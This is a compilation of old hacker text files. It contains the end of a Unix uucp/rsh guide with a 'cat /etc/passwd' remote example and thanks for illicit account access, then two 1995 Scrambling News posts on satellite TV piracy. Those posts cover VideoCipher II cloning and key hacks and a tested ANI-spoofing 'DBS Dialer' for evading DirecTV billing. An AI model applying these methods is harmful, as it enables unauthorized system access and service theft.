the directories in the list in the system tree. The list of directories after
"WRITE=" is in the same form as the list of directories after "READ=", and is a
list of the directories that the remote can copy files TO on the local system.

RSH
---
        This is a new feature which I have seen on a few systems. This is not,
to the best of my knowledge, a System V feature, but a package available for
3rd party software vendors. If the rsh command is featured on a system, the
restricted (rsh) Bourne shell will be renamed rshell. Rsh stands for remote
shell, and is for the execution of any command, interactive or otherwise, on a
remote system. The command is executed realtime, and the output from the
command will be sent to your display. Any keys you press while this command is
being executed will be sent to the remote system, including breaks and
interrupts. The format is:

rsh [system] command line

For example:

rsh ripco cat /etc/passwd

Will print out the /etc/passwd file of the Ripco system on your screen. To the
best of my knowledge, the only security features of the rsh command are the
individual file and directory protections of the remote system.

UUNAME AND UUSTAT
-----------------
        These are 2 commands which are for use by users to show the state of
the local system's uucp facilities. Uuname gives a list of all the system names
in the Systems (L.sys) file, and uustat gives a list of all pending uucp/uux
jobs.

NETWORK MAIL
------------
        There are several different ways of sending mail to users on other
systems. First of all, using the uucp and uux commands. Simply edit a text file
containing the message you wish to send, and uucp a copy of it to the remote
system. Then send it to the target user on that system using the uux command:

uux system!rmail [username] < [pathname]

Where system is the name of the system the target user is on, username is the
name of the user you wish to send the mail to, and pathname is the pathname of
the text file you sent to the remote system. This method works by executing the
rmail command (Receive Mail), the syntax of which is "rmail [user]", and
redirecting its input from the file you sent to the remote. This method will
only work if the remote allows users from your local system to execute the rmail
command.
        The second method is for systems which feature the remote shell (rsh)
command. If the remote system can be contacted by your local system via rsh,
type:

rsh system!mail [user]

And once connected, enter your message as normal.
        This last method is the method of sending mail over uucp networks. This
method is the one employed by USENET and other large uucp networks, as well as
many smaller and/or private networks. This method uses the simple mail command:

mail system!system!system![and so on to infinity]!system@user

Where:
The list of systems is the routing to the target system, and user is the mail
recipient on the target system. The routing takes a bit of explanation. Imagine
a uucp network with connections like this:

                 unix1
                   |
          -------------------
          |                 |
        unix2             unix3
          |                 |
        unix4-------------unix5

This network map shows what systems are on the network, and which systems have
entries for which other systems in its Systems (L.sys) file. In this example:

Unix1 has entries for unix2 and unix3.
Unix2 has entries for unix1 and unix4.
Unix3 has entries for unix1 and unix5.
Unix4 has entries for unix2 and unix5.
Unix5 has entries for unix3 and unix4.

Now to explain the routing. If unix1 wanted to reach unix5, it couldn't do so
directly, since it has no means of reaching it (no entry for it in its Systems
file). So, it would "forward" the mail through a series of other systems. For
example, to send mail to the user root on unix5, any of these routings could be
used:

unix3!unix5@root
unix2!unix4!unix5@root

Obviously, the first routing would be the shortest and quickest. So, to mail a
message from unix1 to the root user on unix5, you would type:

mail unix3!unix5@root

Then type in your message and press control-D when finished, and the uucp
facilities will deliver your mail.
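
The routing described above, as an added example that is not part of the original article: the map is encoded as each system's Systems (L.sys) file entries (constructed to match the diagram), every loop-free routing from one system to another is enumerated shortest first, and addresses are rendered in the article's "system!system@user" notation.

```python
# Added example (not from the article): enumerate uucp mail routings over the
# five-system map above. A hop from A to B is only possible when A's Systems
# (L.sys) file has an entry for B, which is what the adjacency below encodes.
from collections import deque
from typing import Dict, List

# Constructed to match the article's network map.
SYSTEMS_FILE: Dict[str, List[str]] = {
    "unix1": ["unix2", "unix3"],
    "unix2": ["unix1", "unix4"],
    "unix3": ["unix1", "unix5"],
    "unix4": ["unix2", "unix5"],
    "unix5": ["unix3", "unix4"],
}


def all_routes(systems: Dict[str, List[str]], src: str, dst: str) -> List[List[str]]:
    """Every loop-free chain of hops from src to dst, shortest first.

    Breadth-first search over the Systems-file entries; the origin itself is
    not part of the returned route because the sender never types it.
    """
    routes = []
    queue = deque([[src]])
    while queue:
        path = queue.popleft()
        here = path[-1]
        if here == dst:
            routes.append(path[1:])
            continue
        for nxt in systems.get(here, []):
            if nxt not in path:          # never revisit a system
                queue.append(path + [nxt])
    return routes


def mail_address(route: List[str], user: str) -> str:
    """Render a route in the article's 'sys!sys!...!sys@user' form."""
    return "!".join(route) + "@" + user


def shortest_address(systems: Dict[str, List[str]], src: str, dst: str, user: str) -> str:
    """The address the article would have you type from src to reach user on dst."""
    routes = all_routes(systems, src, dst)
    if not routes:
        raise ValueError(f"{src} has no route to {dst}")
    return mail_address(routes[0], user)


if __name__ == "__main__":
    for route in all_routes(SYSTEMS_FILE, "unix1", "unix5"):
        print(mail_address(route, "root"))
    print("mail", shortest_address(SYSTEMS_FILE, "unix1", "unix5", "root"))
```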

ACKNOWLEDGEMENTS
----------------
        Well, this is it- the end of the file. I hope you've found it
informative and helpful. Before I go on, I'd like to thank a few people whose
assistance made writing this file either A: possible or B: easier-

Shadow Hawke I, for sharing many a Unix account with me.
The Warrior (of 312), for helping me get started in hacking.
Omega-- for helping me hack a large network of Unix systems.
Psychedelic Warlord, for helping me with a BSD Unix system.
Shooting Shark, for his C decoy, and more than a few good posts on Private
Sector.
Kid&Co, for providing me with some information on the Telnet program.
And lastly but not leastly, Bellcore, Southern Bell, and BOC's around the
country for the use of their systems. Thanks, all!
-------------------------------------------------------------------
File #3 of 8...

Path: news1.delphi.com!news.delphi.com!uunet!in1.uu.net!news.sprintlink.net!howland.reston.ans.net!news-e1a.megaweb.com!newstf01.news.aol.com!newsbf02.news.aol.com!not-for-mail
From: [email protected] (DavidL6587)
Newsgroups: alt.2600
Subject: Scrambling News: DBS hackers encounter CODE 99 (Part 1)
Date: 16 Jul 1995 08:53:08 -0400
Organization: America Online, Inc. (1-800-827-6364)
Lines: 446
Sender: [email protected]
Message-ID: <[email protected]>
Reply-To: [email protected] (DavidL6587)
NNTP-Posting-Host: newsbf02.mail.aol.com

[This is the first of a two-part update on DSS Piracy. It is
Copyright 1995 by David Lawson ([email protected])
and Scrambling News. All rights reserved. If you would like a
copy of our catalog of video hacker books, simply E-mail or
voice 716.871.1915. Your corrections and constructive
criticism are appreciated.]

Background

We have entered a new era of digital satellite piracy as
acknowledged by DirecTV's press release of June 16 which
is included in this issue. Many of our new subscribers are
interested in DBS (Direct Broadcast Satellite) and may consider
becoming involved in pirating DBS signals so we will discuss
the dynamics of satellite piracy in this article. The satellite piracy
which most are familiar with is that of Videocipher II and we will
concentrate on that system because there are many lessons to be
learned from it. This is not intended to be a complete history. It is
not our intent to promote piracy, but rather to provide information
for the benefit of our readers.

HBO was a pioneer in the satellite delivery of cable programming.
In 1975 it began transmitting its feeds to cable companies around
the country. Conventional distribution involved shipping videotapes
back and forth. The signals transmitted from communications
satellites at that time had a strength of about 5 watts, which is the
signal strength of a CB band radio, yet those signals had to travel
23,300 miles to earth. By that time they were so weak and noisy
that they had to be amplified thousands of times to be strong
enough to be processed by a satellite receiver. It soon became
obvious to other programmers that satellite delivery was cost
efficient and additionally, it allowed them to offer live events. The
first satellite systems purchased by cable companies cost
$120,000+ but by 1977 improvements in technology caused the
price to decrease to the $15,000 range.

The first satellite hackers attempted to construct homebrew
systems to intercept HBO's signals and in 1976, using military
surplus and homemade dishes and homemade electronics they
were able to receive HBO. As more programming became
available on satellite more individuals became interested in
obtaining it and businesses began to manufacture equipment.
Improvements in the technology of the components led to
radical reductions in their cost. A new cottage industry called
TVRO (television receive-only) was born.

By the late '70s "mom and pop" satellite dealerships started
opening up around the country, especially in rural areas not
serviced by cable. Most of the programming available on
satellite at that time was "in the clear." Homeowners who
could afford to spend $6,000-7,000 on a system could
receive free, the same programming being received by the
largest cable companies around the country. They received
HBO, Showtime, TMC, Cinemax, A&E, CNN, WTBS and other
superstations from all around the country and more. The sales
of satellite systems for 1984 were estimated at approximately
750,000.

Dish owners had more entertainment than time to enjoy it but
their benefactors, the programmers, had a problem. They had
invested in satellite delivery of their programming to the
approximately 8,000 cable headends around the country
because it was the most economical means of doing so.
Many cable companies were receiving the programming and
charging their subscribers for it but they were not paying for it
themselves. The programmers decided to secure their signals
in order to prevent the cable companies from pirating them. At
that time there were more than 50 million cable subscribers in
the country and fewer than one million dish owners. Securing
the signals from dishowners was of secondary importance.

The Videocipher II satellite encryption system was designed
by M/A-Com LINKABIT. Designing an encryption system is an
expensive and time consuming proposition. Engineers must trade
off the security features they would like to provide with all the
costs and risks of providing them. In this case M/A-Com opted
to appropriate some of the access control architecture being
employed by the Oak Orion system in Canada. They were later
successfully sued for patent infringement. The Videocipher II
encryption system which they produced was described by
M/A-Com as a state-of-the-art system which was tamperproof
and undefeatable. The VCII (Videocipher II) was touted as the
"only decoder you'll ever need." It employed the "unbreakable"
DES (Data Encryption Standard).

In early January of 1986 dishowners were horrified and dish
sales plummeted as HBO and then the other programmers
scrambled their signals. Most had invested in a satellite system
in the first place because of the free programming which was
available. Now they had to purchase a $300 decoder and pay
for programming. In addition, the subscription rates being
charged were almost double what cable companies were
charging their customers and cable rates reflected the cost
of building a cable plant, running cable to the house and
maintaining the system. Dishowners supplied and maintained
their own equipment. The signals were already being transmitted
for the benefit of the cable companies, the scrambling system had
been designed for cable use and the only additional expense for
programmers in serving the home dish market was in
administration. Some programmers did not even offer
subscriptions to dishowners because they didn't think it was a
market worth bothering with.

Speculation about vulnerabilities in the VCII encryption system
started in March and appeared in the form of a paragraph or two
in each monthly issue of Coop's Satellite Digest which was a
technical magazine for cable and wireless operators. It was also
a monthly chronology of technical improvements in electronic
components, dish construction, etc. Bob Coop was one of the
original satellite hackers and he was one of the founders of TVRO.

Once a credible source started reporting details of the weaknesses
of the VCII system the scams started. Suddenly it seemed as if
everyone knew someone who had seen a fix though they had not
seen it themselves. A friend drove 600 miles to a remote farmhouse
in the middle of the night. He was going to see a demonstration of a
fix that would turn on all the scrambled channels except the pay-per-
view movie services and he would purchase 100 for $150 each and
pay cash. He would not be allowed to buy only one. One of the
individuals selling the fix soldered the leads of a small epoxied add
on board to the legs of some of the critical chips on the decoder. It
seemed credible. My friend was told that in a few minutes the
channels would be descrambled. In the quietness and suspense as
they waited for the channels to be unscrambled he heard someone
in a distant room calling in a credit card number to subscribe to all
the available channels. Several minutes later the sound and picture
appeared on the TV screen my friend was watching. The fix was
bogus. They simply had the decoder authorized legally by
subscribing to programming. The add-on board was a ruse. My
friend found an excuse to leave.

Another scam was perpetrated by an electronics store in the
Bronx. They had a box which was connected between the decoder
and receiver. It restored audio and video to the encrypted channels.
They had a working demo in their store. It cost $150 and was sold
without a warranty. Observers of the fix noted that it restored video
on all VCII encrypted channels but audio was only available on the
channels which just happened to be offered by the local cable
company. They were actually obtaining the audio from their local
cable company in the Bronx and piping it into the TV. What they
were actually selling was a sync generator which restored only the
video signal. Descrambling the video was relatively easy. It was the
audio that was "hard" encrypted.

The first of three attacks on the VCII system involved an
unsuccessful attempt to duplicate the critical proprietary IC's
through the use of a chip stripper. Then a group euphemistically
referred to as DESUG (Data Encryption Standard Users Group)
attempted to reverse the DES (Data Encryption Standard) algorithm.
This was time consuming and it was not a valid option. The third
attempt involved disassembling the decoder control program which
is stored in the system's EPROM. This approach proved successful
and led to three major hacks on the system.

The first hack led to a marketable fix. It was discovered that the
pointer could be redirected to enable decoding on all channels if at
least one channel was subscribed to and this only involved a change
of from one to six bytes, depending on the version of the VCII board.
This hack was known as the three musketeer hack (3M) because it
provided all channels for the cost of one. "One for all and all for one."
The three musketeer fix was first demonstrated in September of
1986 and it was put on the market in December. It did not decode
all services or any PPV channels. It was only necessary to replace or
reprogram the system EPROM in order to 3M a box (decoder). The
response of the decoder manufacturer was to epoxy the printed
circuit board making it harder to tamper with. Hair dryers were used
to soften the epoxy and a utility knife was used to chisel it away.
During the period from January of 1986 to December only 40,000
VCII decoders were sold. In the first two weeks after
the musketeer fix was released, another 80,000-100,000, the entire
inventory of VCII's in the country were sold and dish sales picked up
again.

The second hack on the system involved cloning. There are 32
bytes of information which make each decoder unique. This
consists of four 7 byte seed keys numbered from 0-3 and 4
bytes of unit ID. It was discovered that if the unique
identification information from a subscribed decoder was
programmed into an unauthorized unit, it would decode all the
programming subscribed to by the master. This meant that
hundreds or even thousands of unauthorized decoders could
be cloned to receive the same programming as one decoder
which was subscribed to programming.

About a year after the introduction of the 3M chips, the
"wizard" hack, which irrevocably destroyed the system was
discovered. One of the early chips which featured this hack
was aptly called Doomsday. In addition to the 32 bytes which
provides a unique identity for each VCII decoder, there are
another 28 bytes transmitted in the data stream which are
critical to the decoding function. These bytes are often
referred to as public data. Included is a unique service ID
and channel identifier for each channel, and a period indicator
which indicates the month the data is valid for. Seven bytes
are the authorization mask which identify which services are
subscribed to.

The VCII does a series of calculations involving unit ID
information and the public data to obtain a working key. We
detailed the math in our manual entitled "The Compleat Wizard".
It was discovered that this working key was the same for all
VCII's of the same series and that this common key turned on
all services except the pay-per-view channels. The most
amazing thing about the VC II system was that all non-PPV
services would be decoded if the correct working key was
entered into the correct RAM addresses, and none of the
calculations mattered, and it didn't matter whether the VCII
was authorized or not or even if the unit ID data was valid. The
wizard software which was developed as a result of these
discoveries calculated the working key automatically for the
current and next month. Its operation was essentially
transparent to the user, though it was necessary to enter
keys for the pay-per-view movie services like Request
TV, First Choice and Action Pay-Per-View manually
because their working keys required different calculations.
The keys were entered through the keypad on the
satellite receiver's remote control.

During the period from 1986 to 1992 dishowners engaged in
piracy would install various fixes on their boards and sooner or
later they would be ECM'd (electronic countermeasures) so their
decoder would be shut off and they would have to purchase new
hardware/software. On average, they might have spent anywhere
from $100-250/year for all programming including pay-per-view
and special events. Subscribing to all the programming would
have cost several times that amount.

There was an ongoing ECM program which was operated by G.I.
(General Instrument) after they bought out M/A-Com. When the
first 3M fixes were used in 1986 it was not known that the box
ID was stored in two locations. A message was sent in the data
stream to decoders to compare the ID's in both locations. If they
did not match the box was shut off. VCII's suspected of being
clone masters would be shut off on the grounds that they were
oversubscribed. When wizard technology became predominant
ECM's involved changing channel ID information, assigning
multiple services to the same tier bit, etc. The commercial
decoders used by cable companies could recognize the
difference but residential models could be shut off. Hackers
monitored the datastream on certain channels and they were
able to observe ECM's being tested. This often allowed them to
modify software and hardware fixes and have them ready to
sell before an ECM was actually employed.

Most dishowners had their dishes installed and their decoders
modified by a satellite dealer who kept their system running so
they did not have to be aware of the latest ECM's or fixes. They
didn't have to rely on any satellite dealer though and they didn't
have to be an electronics expert to keep their VCII descrambling
satellite delivered programming. An entrepreneur started a
magazine called the Blank Box Newsletter. The sole purpose of
that magazine was to provide advertising space for those selling
the latest fixes because they could not buy space elsewhere. It
was devoid of editorial content. Every month the advertisers
featured the latest pirate products and services. The pirate
products available ranged from how-to videotapes to seed key
pullers, hardware/software fixes for all models of VCII boards,
DES calculator software, VCII emulator software, etc. A list of
the advertisers in the magazine was a list of who had been
busted. Anyone capable of plugging in a chip or soldering could
follow the instructions which accompanied the latest chip or
hardware fix. If they couldn't do it themselves, there were a half-
dozen businesses they could overnight their descrambler to, and
most of them provided excellent service. The name Blank Box
Newsletter was discovered to be a copyright infringement so the
name was changed to Satellite Watch News.

Dishowners did not even have to subscribe to a magazine to be
kept abreast of the latest techniques for pirating satellite
television. They could watch it on their satellite systems. The
patron saint of satellite dealers is the late Shawn Kenny. He
used the medium itself. From a makeshift studio located at his
New Jersey satellite dealership he produced a weekly show
called Boresight and he rented time on whatever satellite had
space available. It wasn't very expensive. He was another of the
pioneers. He hated scrambling and considered the VCII to be a
piece of junk. His motto was "a (decoder) module in every home."
His show included satellite news, tech tips for dish dealers,
some kibitzing and a segment called "Yellow Rain (Piss on
the VCII)." He had an encyclopedic knowledge of satellite
equipment and when he was demonstrating components he
considered inferior he would place them on a block and smash
them to pieces. In the Yellow Rain segment he
delighted in showing programmers the latest means by which
their programming was being stolen. Fixes were demonstrated
and guests explained in exquisite detail how to pull seed keys
from a decoder or adapt certain fixes to different versions of
the decoder. Someone found a set of schematics and
technical information about the VCII allegedly in a dumpster
behind General Instrument's manufacturing facility. They
were marked confidential. Shawn was ecstatic. He copied
and sold them as a package every week along with his
other products. At one point G.I. sued him and got a
$625,000 judgment against his company but they were
never able to collect.

One of the more amazing hacks which was shown on
Boresight was the Parasite board. It illustrated just how
completely the Videocipher II was understood by the hackers.
It was a Videocipher II clone built with non-proprietary
components. To make it function it was only necessary to load
it with unit ID data. It was a precursor of the SUN (Secure
Universal Norm) decoder. Unlike the Videocipher II which uses
an embedded secure processor, the SUN used a detachable
secure processor. It was a plain vanilla decoder which could
be programmed to emulate a VCII, Oak, or B-MAC and it
could be reprogrammed in case of a security breach. When
SUN boards were first introduced they were 2 years ahead
of pirate VCII technology. They stored two clone ID's and
had wizard back up for 8 different working keys and they
countered a variety of ECM's years before they were actually
employed. The only crime worse than using a Videocipher II
decoder to steal satellite delivered programming was to steal
it without using a Videocipher II decoder. General Instrument
sued Dectec, manufacturer of the SUN, on the grounds that
the SUN used the Videocipher II operating system. Dectec
denied it. Their operating and data transfer system was
encrypted using a Dallas SIP Stik which provides the same
level of security used by the banking industry to protect their
data. G.I. was not able to prove their case in Canadian courts
though they did effectively cripple the company.

By 1992 General Instrument started to take control of its
system. It established a swap out program to issue VCII
PLUS units to legitimate subscribers with untampered decoders.
Instead of a common key which turned on all services except
the PPV's each service now had its own unique working key
but it was still a common key which worked in all residential
decoders. Instead of entering a 20 digit monthly key which
would turn on all the basic services, it became necessary to
enter 20 digits for each of the 60 or so channels available.
Then the keys started changing more frequently, with some
changing weekly and then daily. This led to the development
of modem based fixes which would allow the user to simply
press a button on their remote control which would cause the
modem to call a BBS and download the latest working keys
into the RAM of the Videocipher board. This worked for a while
but other ECM's made it necessary to make frequent software
and hardware changes. In addition, many individuals were
paying for long distance charges to a BBS in order to download
the keys. When the movie channels like HBO and Showtime
moved to the VCII PLUS system, most dishowners abandoned
piracy because they could no longer get the channels they really
wanted and the cost of piracy was higher than the cost of
subscribing to the channels which were still available.

The pirates established a sophisticated computer network in
order to obtain and distribute working keys. It consisted of a
central computer connected in real time to a number of
satellite dishes around the country. The dishes were programmed
to receive monthly hit data and then move to another
channel. That data was then sent from the central computer,
again in real time, to several nodes positioned around the
country. Local satellite dealers received their monthly data
from the node computers so consumers in many cases only
had to make a local phone call to a BBS operated by a local
satellite dealer. The working keys for some services were
obtained from the commercial VCII decoders installed at
cable companies around the country by the technicians who
maintained them. Data necessary to calculate the working key
was only sent occasionally, so decoders dedicated to one
service like those at cable headends did not miss it. Once
obtained, the keys would be posted on BBS's across the country.
G.I. tried to determine the location of these compromised
commercial decoders by sending bogus data and watching
the working keys posted on the BBS's. They could take that
information, calculate the box ID from it and they would know
which cable headend it was installed at. This led to
co-operation among the various BBS's to stop posting working
keys until they were verified, so they would not jeopardize the
individuals who obtained them. Some individuals were charged,
nevertheless.

When G.I. did finally start to shut off massive numbers of
pirate decoders they did so with almost mathematical precision.
They knew what fixes were available for each model of their
decoder and how many dishowners were using each. They shut
them down sequentially so their production facilities and
pipeline were not overloaded because they also knew how
many VCII PLUS boards they would sell to those who had
been shut off. It is interesting that the devastatingly effective
rounds of ECM's which occurred at the very end of VCII piracy
could have been done years before.

The era of Videocipher II piracy has ended. The "de facto"
encryption standard was also the world's most hacked
scrambling system. Until very recently it was possible to
pirate two dozen or so services. In the last few weeks the
working keys have been changing every few hours.

The fatal flaws in the encryption system are not
lost on those designing today's systems. The access control
system was left in the open where it was easily
accessed. It employed an embedded secure processor which
could not be changed when there was a breach of security, and
the control data could be modified.

It took General Instrument 7 years to secure its encryption
system. An article in one of the satellite trade magazines a
couple of years ago estimated that over the years General
Instrument had made a profit of about $800 million strictly
from piracy. Many believe that G.I. itself released details of
its system so it would be hacked. With all the security
features the system employed it had a wide-open back door.
In 1987 G.I. claimed it had manufactured 300,000 decoders but
independent sources with access to information from component
suppliers claimed that 1.3 million had been produced. The
number of authorized decoders was only ever a small fraction
of the production figures. It was discovered that over 400,000
had been shipped to Canada at a time when it was illegal for
Canadians to own them. Hundreds of thousands more were
illegally shipped to Mexico and the Caribbean.

Today, there are 2.3 million subscribed VCII PLUS decoders in
the country. HBO has well over a million paying subscribers.
Some speculate that VCII piracy was tolerated in order to
sustain the growth of the satellite business. They believe that
if the system had not been hacked it is unlikely the industry
would have achieved the growth it has had. To the best of our
knowledge no dishowner in this country has ever been charged
with pirating satellite delivered programming but those who
modified the decoders were. Hundreds of satellite dealers lost their
businesses, families, homes and liberty. During the heyday of
VCII piracy it was so pervasive that dealers who were selling
satellite systems and subscription programming simply could not
compete with dealers who sold systems with free programming.
By the same token it is difficult for a secure encryption system
to compete against one which is hacked when the public has
the choice of which system to purchase.

We have now entered the age of digital compressed satellite
programming and all analog systems are converting. Because
of compression it is possible to put several channels on a
transponder which now only carries one. The savings for
programmers far outweigh the astronomical cost of the
necessary equipment. For some consumers, a pirate smart
card which would provide access to all DirecTV programming
would be a dream come true. It may happen, despite what
now appears to be a fortress of security features built into
the system.

[In part two we focus on existing DSS piracy: DSS hackers
discover Code 99.]

END PART 1 OF 2 PARTS
-------------------------------------------------------------------
File #4 of 8...

Path: news1.delphi.com!news.delphi.com!uunet!in1.uu.net!news.sprintlink.net!howland.reston.ans.net!news-e1a.megaweb.com!newstf01.news.aol.com!newsbf02.news.aol.com!not-for-mail
From: [email protected] (DavidL6587)
Newsgroups: alt.2600
Subject: Scrambling News: DBS Hackers Encounter CODE 99 (Part 2)
Date: 16 Jul 1995 08:53:09 -0400
Organization: America Online, Inc. (1-800-827-6364)
Lines: 434
Sender: [email protected]
Message-ID: <[email protected]>
Reply-To: [email protected] (DavidL6587)
NNTP-Posting-Host: newsbf02.mail.aol.com

[This is the second of a two part update on DSS piracy. It is
copyright 1995 David Lawson ([email protected]) and
Scrambling News. All rights reserved. E-mail or voice
716.874.2088 for a free product catalog of hacker books.
Your corrections and constructive criticisms are appreciated.]

DSS Hackers Encounter Code 99

The DSS System

The DSS system rolled out nationally last September and in
less than a year it has acquired about 650,000 subscribers.
There are two more DBS systems ready to launch. The dish
size, ease of installation, low maintenance and up-front cost
of the systems are major reasons for the faster sales of DSS.

The DSS scams have started. It is July 6, 1995 and there are
no fixes for the system available other than gray marketing
as we have discussed. A business called Test Card is, however,
advertising that they are looking for dealers and
distributors for a DSS test card. Someone else has a package
for $29.95 which describes how to get $1000 worth of
programming for $50/yr. "Don't miss out on this hot new information
package." No one we know who has responded to these ads
has received anything back yet. There may also appear in
the next few months DSS bibles, software packages which will
likely consist of the various pirate programs and source code
used to break the European version of Videocrypt. They will
probably originate from John Mc Cormac's Special Projects
BBS which is a repository for Videocrypt information. There
may also be bogus DSS reader/writer software and a PC
interface. The data structure is non-standard. A working PC
interface for this system is complex and very expensive.

The DSS system employs a digital and far more secure version
of the Videocrypt encryption system which is used in Europe. It
is a smartcard system which employs a detachable secure
processor. If security is breached, the smartcard is replaced.
The European system has just issued its tenth series of smart
cards. All previous series have been hacked. Europeans can
walk into shops and purchase the latest pirate smartcard or
order by mail. Services using Videocrypt are only authorized for
specific countries so those in other countries can purchase
pirate smartcards with impunity. They typically work for 6
months or a year and cost $150. Inevitably they are shut off
and the users wait a month or so until the next version is ready.

A rumour is that John Grayson's chief engineer at Dectec has
been hired by a Western Canadian group working on DSS.
He designed the SUN board. Supposedly there are 10
members of the group and each has contributed $50,000 to
the project. John Grayson was recently spotted at a Cable
Show in Europe and has moved on to other projects. This
means there are now two separate groups working to
develop a marketable fix for DSS. The existing work done
on the system has involved a consortium of U.S. and
European engineers. The Europeans have years of
experience with Videocrypt and there are now several
groups with expertise to work on the system.

Anyone trying to reverse engineer the smartcard will encounter
the nefarious code 99. The card developed by RCA and
Motorola can be rendered useless by hi-frequency, low
voltage, temperature and other types of probing. Any type of
tampering results in erasure of the micro code in the EEPROM
and sets the card to code 99, rendering it absolutely useless.
The smartcard which has been developed for the DSS system
is, at this moment in time, impervious to all known methods of
hacking. In addition, code can be reprogrammed on-the-fly,
every 29 seconds. Reprogramming was used in the 09 series
smartcards in Europe which increased their longevity, although
they eventually had to be replaced anyway.

Just as hacking the Videocipher II system never involved
breaking the DES, hacks for the DSS system do not necessarily
involve being able to reverse engineer the smartcard. The fix to
be released will probably involve reprogramming the card to
add existing services to those already being paid for, including
pay-per-view credits, sports etc. An earlier plan to offer 4
different cards with different tiers of programming has been
abandoned because it has been found that the card cannot be
duplicated. Any DSS receiver can be cloned to work with any
smartcard. It can also be shut off independently of the
smartcard. A benefit for users of reprogrammed smartcards is
that they will have to maintain some level of subscription so they
will not lose all programming when the card is shut off and has
to be reprogrammed. A huge problem with making a business
of any hack for the DSS system involves the massive security
which is in place. Current plans involve distribution of
programming software to 500 sites. The software will only be
able to program 100 cards, then new software must be
purchased. This ensures that the developers will be paid
frequently. The software will not be generally distributed or
posted on BBS's. We do not know more about the distribution
system. Each card being reprogrammed requires a separate
program. A better distribution system would involve the internet
and would allow individuals to reprogram their cards directly
using the phone line, which is DirecTV's own backdoor into
the box. In the short term, piracy of the DSS system may be
of the gray market variety and may exclusively involve use of
the DBS Dialer which has just been developed.

Gray Market Piracy - The Dialer Systems

Some non U.S. residents subscribe to DirecTV programming
by simply obtaining a U.S. billing address. Any phone book
lists Mail Receiving Services which provide a street address.
Many telephone answering services also provide this service
as well as private phone lines. When they subscribe they
simply say they do not have a phone. This precludes them
from ordering sports packages like NFL Sunday Ticket,
NBA League Pass, the NHL Center Ice package or the regional
sports networks. They must also order special events manually
at an additional charge of $2. Since many foreign subscribers
do want access to sports and PPV events it was natural for a
variety of call forwarding services to be established.

The two dialer systems which are the subject of the press
release from DirecTV have been operating in Canada for
several months. One system is based in Ontario and the other
is in British Columbia. The Ontario system was diverting
monthly calls from the DSS boxes to a Western NY number while
the B.C. system diverted its calls to Blaine Washington.
Canadians have been purchasing thousands of DSS systems and
they are even being sold in major consumer electronics stores.
The head of the CRTC which is the Canadian equivalent of the
FCC has said on the national news that Canadians will not be
prosecuted for subscribing to DirecTV. At the same time DirecTV
has no legal right to extend subscriptions to Canadian residents.
Those complaining about DSS are the cable companies and
Expressvu, a Canadian based DBS service which is almost ready
to launch. With their dismal roster of Canadian programming they
cannot possibly compete with gray market DirecTV programming
even though Canadians must pay the high subscription prices
charged by DirecTV and USSB with Canadian dollars which are
worth $.70 U.S.

The dialers currently being used by the Canadians are Equal
Access dialers which were used at one time to dial the prefix to
connect to Sprint. They are now surplus and the operators of
these dialer services have been purchasing quantities of them
for $30 each and then charging Canadians $150 apiece with a
subscription to their redialer service. That only involves
establishing U.S. phone numbers to route the calls through.
Some operators only had one or a few U.S. numbers so
hundreds of DSS systems were connected to Canadian
phone lines and routing their monthly PPV billing calls
through the same U.S. phone number. The dialers pass ANI
data from the originating phone number as call forwarding
systems do. In addition, the systems are not secure. To
exacerbate the situation, the phone numbers being used
were posted on BBS's so many individuals piggybacked
on the system. Some foreign subscribers even plugged
their DSS boxes directly into the phone line, essentially
requesting that their systems be shut off. The problem is
that ANI (Automatic Number Identification) data is
transmitted with phone calls. This data identifies
the billing phone number including area code. Businesses like
DirecTV which rent 800 numbers receive ANI data along with
other caller information and callers to 800 numbers give up that
data whether they know it or not, and regardless of whether
their phone number is unlisted or not.

The DBS Dialer

This is a newly engineered gray market product intended for
use by those in offshore countries where DirecTV is not
licensed to operate. It is available from New Advanced
Technologies at 514.458.3063. The system consists of two
units. The dialer is connected between the DSS unit and the
phone line. It intercepts the 800 number call made by the unit
and routes it to whatever U.S. number it has been programmed
to call. The call is received by the diverter unit which strips out
ANI data associated with the true phone number and substitutes
the ANI of the billing phone number the diverter is connected to.
The diverter must be connected to a line with three way calling
capabilities.

The DBS Dialer system has many desirable features. It allows
users to operate their own system independently without having
to subscribe to someone's service. It is not necessary to reveal
phone numbers to anyone who might piggyback or otherwise
compromise the system. Users are not reliant on the supplier
and need not pay subscription fees. Both dialer and diverter(s)
are password protected and the password of the dialer(s)
must match that of the diverter. Anyone wanting to piggyback
on the system would have to know the password as long as it
is changed from the default value of 1234. The system is
completely field programmable and there is a separate
password allowing access to programming functions. The
system has been designed so that in case of a power failure
the dialer unit shuts down rather than pass ANI data about
the location of the system. DirecTV uses several 800 numbers
and DSS units store them in both the "smart" modem and in
EEPROM. The DSS modem can be programmed to execute
a wide variety of countermeasures. Designers of the DBS
Dialer have taken this into consideration. The code in the
diverter may be updated if it is necessary. The designers
are now adding capture, store and forward technology to the
dialer so it won't matter what number the DSS unit calls. The
Canadian dialers were shut off when DirecTV changed the
number the DSS units called. They can be reprogrammed
but a simple command in the data stream will shut them off
again and they will have to be reprogrammed again.

DBS Dialer - Programming

The dialers have two RJ11 jacks. Ordinarily the DSS unit
is connected to the jack marked DSS. For programming
purposes a telephone is connected to this jack. A standard
telephone line is plugged into the other.

We received a beta version of the dialer and diverter for test
purposes. We began our test by changing the programming
password to 2198. We changed the dialer and diverter
passwords to 9299. They must be the same. In a case where
more than one diverter is used in a network, the diverter
passwords must match as well. We programmed the dialer
to call the number where the diverter was located. We left
the trigger sequence at the default value of 1-800 but if we
were on a phone system where we had to dial 9 to call out
then we would have programmed it in place of 1-800. Call
capture store and forward capability is being added to the
system so the programming instructions we included in the
hard copy version of this report are now redundant. We also
stated that the New Advanced Technologies advertisement
says it supplies U.S. addresses and phone numbers. It does
not.

Telephone companies maintain regional ANI circuits to assist
line technicians with testing and line identification. Dialing
one of these numbers connects the caller with a computer
which reads back his ANI data. We used 1-800-MY-ANI-IS
which is an MCI service. Another service is at 10732-1-404-988-9664.
It is also a toll free number. We connected a phone in
place of the DSS receiver and made the call. The dialer
intercepted the number we dialed, forwarded the call to
diverter, and the diverter called 1-800-MY-ANI-IS. The
ANAC computer reported the phone number and area
code where our diverter box was located and not the
actual phone number we were calling from. Individuals
from Canada, Mexico and the Caribbean have also tested
the system and found it to work. The DBS Dialer worked
perfectly. It does the job it was designed to do.

The footprint of the DirecTV signal covers the continental
U.S. and most of Canada. We have heard of reception as
far south as Mexico City (with a 3 foot dish) and throughout
the Caribbean. The DBS Dialer allows individuals in those
countries to subscribe to programming and receive pay-per-
view events. A very low profile system would have only one
DSS system connected to a diverter box located at a U.S.
